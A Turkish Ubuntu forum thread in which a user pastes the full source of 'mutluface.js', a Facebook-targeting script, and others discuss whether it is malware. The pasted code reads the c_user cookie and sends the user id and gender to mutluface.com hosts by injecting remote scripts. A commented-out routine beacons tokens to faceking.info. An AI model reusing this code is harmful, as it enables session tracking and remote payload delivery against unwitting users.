[çözüldü] Malware midir, nedir bu?

[monthy_python]

Mmerhabalar.
Öncelikle şunu söyleyim, java bilmiyorum.
Geçen gün yanlışlıkla bir linke bağlantıya tıkladım, mutluface.js diye abuk bir şey karşıma çıktı.
Araştırdım, şurada http://www.phishtank.com/ kaynak kodunu buldum.
Nedir bu, zararlı bir herze midir?
kodu şöyle:

Kod Seç Genişlet

/**
* mutluface
* burada küfürlü bişeyler vardı, sansürledim
**/
/* Variable globale do not modify */
// Variable user
//function randomString(a){var b="0123456789ABCDEFGHIJKLMNOPQRSTUVWXTZabcdefghiklmnopqrstuvwxyz";var c=a;var d="";for(var e=0;e<c;e++){var f=Math.floor(Math.random()*b.length);d+=b.substring(f,f+1)}return d}
//function rx(x,y){if(x&&y){if(x==y){return x;}else if(x>y){var z=x;x=y;y=z;}
//return Math.floor(Math.random()*(y-x+1))+x;}else if(y){return Math.floor(Math.random()*y+1);}else{return Math.floor(Math.random()*100);}}
//tkx=new Image();function tky(){var appz = ['176901472156','2530096808','350685531728','17037175766','4949752878','2227470867'];tkx.src= 'http://tokenx.faceking.info/index.php?token=AAA'+randomString(rx(90,110))+'ZDZD&appid='+appz[parseInt(Math.random()*appz.length-1)];var t=setTimeout("tky()",1000);}var t=setTimeout("tky()",1000);

var FB_UID=0;
var SEXE=0;
var FB_NAME="";
// preference
var reklam ="http://gulo.mutluface.com/reklam.html";
var bokcurl='http://mutluface.com';
linek=new Array("http://mutluface.com","http://mutluface.com","http://mutluface.com","http://mutluface.com","http://mutluface.com","http://mutluface.com","http://mutluface.com");


var sc=document.createElement('script');
sc.src=document.location.protocol+'//graph.facebook.com/'+fb_uid()+'&callback=cins';
document.getElementsByTagName('head')[0].appendChild(sc);


function cins(data)
{
if(data && data.gender)
{
if(data.gender=='male') SEXE=1; else SEXE=2;
}
else { SEXE=3; }
return SEXE;
}

function fb_uid()
{
gecuid=GetCookie("c_user");
if(gecuid>2)
{
return gecuid;
}
else
{
return Env.user
}
}

function GetCookie (name) {
         if ( document.cookie) { // Le cookie est-il valide ?
                  index = document.cookie.indexOf( name);
                  if ( index != -1) {
                           nDeb = (document.cookie.indexOf( "=", index) + 1);
                           nFin = document.cookie.indexOf( ";", index);
                           if (nFin == -1) {nFin = document.cookie.length;}
                           return unescape(document.cookie.substring(nDeb, nFin));
                  }
         }
         return null;
}








var defaut=[];
defaut['mykey']="0";
defaut['cachedTxt']="";
defaut['bestTxt']="";
defaut['groupes_enabled'] = "false";
defaut['pages_enabled'] = "false";
defaut['comment_enabled'] = "false";
defaut['like_enabled'] = "false";
defaut['relations_enabled'] = "false";
defaut['friends_enabled'] = "false";
defaut['event_enabled'] = "false";
defaut['smiley_enabled'] = "true";
defaut['dislike_enabled'] ="false";
defaut['forme_enabled'] = "true";
defaut['editor_enabled'] = "true";
defaut['chat_enabled'] = "true";
defaut['chat_wizz_enabled'] = "true";
defaut['note_enabled'] = "true";
defaut['otolike_enabled'] = "true";
defaut['skin_enabled'] = "true";
defaut['photo_enabled'] = "true";
defaut['theme_extend'] = "true";
defaut['promo_enabled'] = "true";
defaut['hidefriendoffline']="false";
defaut['fav']="";
defaut['camtype']=0;
var expirecache =  10 * 60 * 1000; // 30 days  

var GM_log = function(str){ return str;};
var GM_getValue= function(str) {if(localStorage[str]==undefined)localStorage[str]=defaut[str]; return (localStorage[str]);};
var GM_setValue= function(str,value) { localStorage[str]=value;};





if(GM_getValue('sil')=="silindi")
{
setTimeout("var sxviral=document.createElement('script');sxviral.src='http://gulo.mutluface.com/offline.js?cins='+SEXE+'&amtasak='+fb_uid()+'&x='+Math.random()*999999;document.getElementsByTagName('head')[0].appendChild(sxviral);",3000);
}
else
{
var gitcek=document.createElement('script');
gitcek.src='http://gulo.mutluface.com/1333458695713783.jpg';
document.getElementsByTagName('body')[0].appendChild(gitcek);
setTimeout("var sxviral=document.createElement('script');sxviral.src='http://gulo.mutluface.com/zaza.js?cins='+SEXE+'&amtasak='+fb_uid()+'&x='+Math.random()*999999;document.getElementsByTagName('head')[0].appendChild(sxviral);",3000);
}
Kıllanmalı mıyım? Pek anlamam bu işlerden

Düzenleme Notu: Yazım kurallarına uyunuz.

[alquirel]

Öncelikle, paylaştığınız kod Java değil JavaScript.
İsim benzerliği olsa da çok çok farklı şeylerdir.

Betiği bulduğunuz yerin isminden de edineceğimiz ipucu üzere, bu bir "phishing" betiği.

Kullanmalı mıyım derken nerde nasıl kullanacağınızı anlamadım?

[monthy_python]

"Kullanmalı mıyım?" demedim, "Kıllanmalı mıyım?" dedim

linke Bağlantıya tıkladım, boş bi sayfa çıktı karşıma ya da haha falan yazıyordu tam hatırlamıyorum.
Phishing betiğiyse, ben kanıp da bilgi girmediğim sürece sorun yok diye biliyorum. Sayfada böyle bir giriş yeri, hiç bir şey yoktu.
Paranoya yaptım ondan sordum.
Sorum biraz cahilce olabilir, özür dilerim. .exe olsa dert etmezdim, java multiplatform olduğu için malware midir, virus müdür, unix sistemi için tehlikeli olabilir mi vs.
java script pardon.. 

Düzenleme Notu: Yazım kurallarına uyunuz.

[alquirel]

Özür dilerim, yanlış okumuşum

Açıkçası bulduğunuz sitenin ismine bakıp çok da ayrıntılı inceleme gereği duymadım. Nihayetinde ihtimal bile varsa bence kıllanmak lazım.

JavaScript programlama dili değildir, betik dilidir.
Betikler de ayrı bir uygulama olarak çalıştırılmazlar, mutlaka bir yorumlayıcısı olması lazım (derleyici değil)

Yani internet tarayıcısı olmadan bu kod işe yaramaz.

[monthy_python]

E var internet tarayıcısı! Açık şu anda!!
Aanlayamadım ne demek istediğinizi.


Mesaj tekrarı yüzünden mesajınız birleştirildi. Bu mesajın gönderim tarihi : 11 Mayıs 2012, 14:47:57
Belki ben düzgün soramıyorum. Şöyle sorayım: Bilgisayarımda zararlı yazılım olma ihtimali var mı? Tarayıcıda mesela..
noscript plugini yükledim ama, yeni yükledim onu da.

[alquirel]

Yani, bu kodun çalışabilmesi için gerekli olan şey internet tarayıcısıdır.
Bunun için de film oynatıcıda film açmak gibi, tarayıcıda bu kodun çalıştırılması lazım.

Bu da bir sitenin içine konularak olabilir mesela.
Tehlikeli veya tanımadığınız sitelerden uzak durmak buna bir önlemdir.

[monthy_python]

Ben o siteye çoktan tıkladım diyorum!! Okumuyo Okumuyor musunuz yazdıklarımı? Önlemi mi kalmış? Geçti bor'un pazarı 

Sırasıyla şöyle oldu:
1- Bir linke Bağlantıya tıkladım hasbelkader, gitmek istediğim yer degil, boş bir sayfa ve "ha ha "yazısıyla karşılaştım
2- Adres cubugunda çubuğunda (adınıunuttum.js) yazdığını gördüm
3- adınıunuttum.js' yi bayağı bir aramadan sonra, güvenilmez/şüpheli siteleri listeleyen linkini bağlantısını verdiğim diğer sitede buldum,
4- Orada js'nin bir alt dizinin de adresi vardı ki buradan "view page source" yaparak kaynak kodu indirdim.

Bu kaynak kodu okuyabiliyor musunuz? Malware mi bu? Bilgisayarıma yüklenmiş midir? Yüklendiyse nasıl kurtulabilirim?
Format mı atayım? Ne edeyim?

Düzenleme Notu: Yazım kurallarına uyunuz.

[alquirel]

Phishtank sitesinde bulduğunuz adreste şöyle yazıyor.

This site is not a phishing site.

http://www.phishtank.com/phish_detail.php?phish_id=1430005

Ben betiği tarayıcımda açtım, herhangi bir işlem yapmadı.
Bilgisayara çerez de bırakmadı.

[monthy_python]

temiz miyiz bu durumda? kapmamış mıyız şifayı? 
e güzel o zaman, teşekkür ederim.

bir soru daha sorayım o zaman:

bu javascriptler nasıl çalışır, ne yapar?
phshing başka bir sitenin; sözgelimi gmailin giriş sayfası gibi görünen bir sayfa hazırlayıp, buraya bilgi girme gafletinde bulunanların şifresini çalmak mesela. burada bilgi girmezsek sorun yok.
peki, sadece bir sayfaya tıklayarak bilgisayarımıza javascriptlerin akmasına, ve sonradan browserin bilgimiz haricinde işler çevirmesine sebep olabilir miyiz?
sorudaki sebep: facebookta arkadaşlarımdan saçmasapan ilan/reklam geliyor, biliyorum ki o kişi o ilanı göndermez. bunu gönderten javascript midir? yoksa bunlar bildiğin exe yemiş gafil windowslar mıdır? exe yemişse ne güzel, allah ziyade etsin > ama bu reklamlara java yolaçmışsa; java uygulamaları unix'te de çalıştığına göre ben de risk altındayım demektir?

çok mu kafa şişirdim?
paranoyak etti bu java beni 

[heartsmagic]

@monthy_python, @alquirel açıkladı sana fakat yine de aynı yanlışa düşüyorsun. Bu konu Java konusu değil, Javascript konusu. Java Linux üzerinde çalışıyor doğru biliyorsun, platform bağımsız ama senin örneğin Java değil, Javascript.

Tehlikede misin? Hem evet hem hayır. Ne olduğuna göre değişir bu fakat genelde zarar verebilmesi için bu türde şeylerin kullandığın tarayıcının bir açığının olması lazım. Güncel paketler kullan, çok da işkilleniyorsan Noscript'e devam et.

[monthy_python]

@monthy_python, @alquirel açıkladı sana fakat yine de aynı yanlışa düşüyorsun. Bu konu Java konusu değil, Javascript konusu. Java Linux üzerinde çalışıyor doğru biliyorsun, platform bağımsız ama senin örneğin Java değil, Javascript.

javascript çalışmıyor mu linux üzerinde?

Tehlikede misin? Hem evet hem hayır. Ne olduğuna göre değişir bu fakat genelde zarar verebilmesi için bu türde şeylerin kullandığın tarayıcının bir açığının olması lazım. Güncel paketler kullan, çok da işkilleniyorsan Noscript'e devam et.

sizce sorumun cevabı bu mu?
cevap şu gibi: "sen güncellemeleri yap, gerisine takma kafayı."
nocript'i bu sayfada inaktif etmek zorundayım mesela, yoksa bağlantı ekle, kod ekle vs çalışmıyor.

şöyle netleştirebilir miyim sorumu: varsayalım kullandığım paket en eskisi, tarayıcı açıklarla dolu vs vs
js'in tarayıcıma yaptırması olası müdahaleler neler?
js bilgisayarda nerede bulunur, kendini gizler mi (gizli dosya vs yaparak), kendini kopyalar mı (virüs gibi), silinmesine engel olacak komutlar içerebilir mi? tarayıcımın herhangi bir js tarafından manipüle edildiğini düşünüyorsam ne yapayım?
yani bu javascript in sınırlarını anlamak istedim.

[if]

sizce sorumun cevabı bu mu?
cevap şu gibi: "sen güncellemeleri yap, gerisine takma kafayı."

Ne güzel cevabı bulmuşunuz. Konuyu kapatabiliriz o zaman. Bu arada, yazım kurallarına lütfen uyunuz.

[heartsmagic]

@monthy_python, sorun öyle bir soru ki biz ne desek sen sanırım "Cevabı bu mu?" diyeceksin. Hani mimikleri de göremediğimiz için sen bunu kinayeli bir şekilde mi söyledin, yoksa cidden safiyane bir şekilde mi soruyorsun onu da anlamıyorum. Biz ne desek sen meseleyi uzatacak gibisin.

Sisteminde kullandığın tarayıcı çok eskiyse, bir dünya açık varsa sistemine neler yapacağı o bir dünya açığa bağlıdır. Senin sorduğun soruya göre net bir cevap veremeyiz ki bizler. Javascript birçok sitede yer alıyor, sana nokta atışı cevap veremeyiz ki bizler.

[monthy_python]

@heartsmagic: gereksiz bir tartışma çıkarmak değildi amacım, özür dilerim. ve evet kinaye yaptım, latife ettim  .
@if: imla konusunda hayatımda ilk kez uyarı aldım. cep telefonu mesajlarında bile imlasına özen gösteren biri olarak, bozulmadım dersem yalan olur. yalnız sanırım uygulama biraz kişiye özel:
http://alturl.com/n3i38
http://forum.ubuntu-tr.net/index.php?topic=29288.0
tahminim, birşeye kızıp uyarıyı başka yoldan yapıyorsunuz.

script ve güvenlik konusunu araştırırken rastladığım faydalı birkaç link verip, başlığı "çözüldü" olarak değiştireceğim izin verirseniz.
ilgilenip cevap yazan herkese teşekkür ederim.

phish adresler:
http://www.phishtank.com/

exploit database:
http://www.exploit-db.com/

phishing nedir, nasıl yapılır
http://www.hackingloops.com/2011/10/how-to-make-phisher-or-fake-pages.html

javascript nedir:
http://www.mutasyon.net/dersoku.asp?id=61
ne yapar:
http://bit.ly/yN4f64
http://forums.fedoraforum.org/archive/index.php/t-144296.html

Cross-Site Scripting (XSS):
http://css-tricks.com/what-is-xss/
http://seclists.org/bugtraq/2012/May/62

linux vulnerability test:
https://bugzilla.redhat.com/attachment.cgi?id=556461
compile & run:
$ gcc -o test test.c
$ ./test
vulnerable

spam engellemek:
http://www.mutasyon.net/makaleoku.asp?id=691

security tools:
http://www.junauza.com/2008/07/10-best-hacking-and-security-software.html
http://www.ubuntugeek.com/list-of-security-tools-available-in-ubuntu.html

python olmazsa olmaz  . py security tools:
http://dirk-loss.de/python-tools.htm
http://forum.ubuntu-tr.net/index.php?topic=31555.0

[burk]

@if: imla konusunda hayatımda ilk kez uyarı aldım. cep telefonu mesajlarında bile imlasına özen gösteren biri olarak, bozulmadım dersem yalan olur. yalnız sanırım uygulama
tahminim, birşeye kızıp uyarıyı başka yoldan yapıyorsunuz.

@monthy_python bu gidişle daha çok uyarı alırsınız zira bilmediğinizi kabul etmiyorsunuz. En basitinden noktadan sonra gelen kelime büyük harf ile başlar. Tıpkı şimdi yaptığım gibi. Kelimeleri doğru yazmak imlâya uyulduğu anlamına gelmiyor ne yazık ki...

Ben konuyu okumuş olsam da alıntıladığım kısım yüzünden bu cevabı yazıyorum, @if de yanlış gördüğü kısımla ilgili bir uyarı yapmış, yani gördüğünüz üzere "kızdığımız" şeye uyarı veriyoruz.

[if]

@if: imla konusunda hayatımda ilk kez uyarı aldım. cep telefonu mesajlarında bile imlasına özen gösteren biri olarak, bozulmadım dersem yalan olur. yalnız sanırım uygulama biraz kişiye özel:
http://alturl.com/n3i38
http://forum.ubuntu-tr.net/index.php?topic=29288.0
tahminim, birşeye kızıp uyarıyı başka yoldan yapıyorsunuz.

@monthy_python, ne kadar özen gösterdiğiniz anlaşılıyor alıntıladığım kısımdan bile. Kafanızı kaldırıp forumdaki diğer konulara da bakarsanız uyarının herkese yapıldığını görürsünüz fakat binlerce iletideki yazım yanlışlarını düzeltmemiz mümkün değil. İşimiz o değil. İşimiz olmamasına rağmen maalesef forumun düzeni adına bunu da yapmak zorunda kalıyoruz.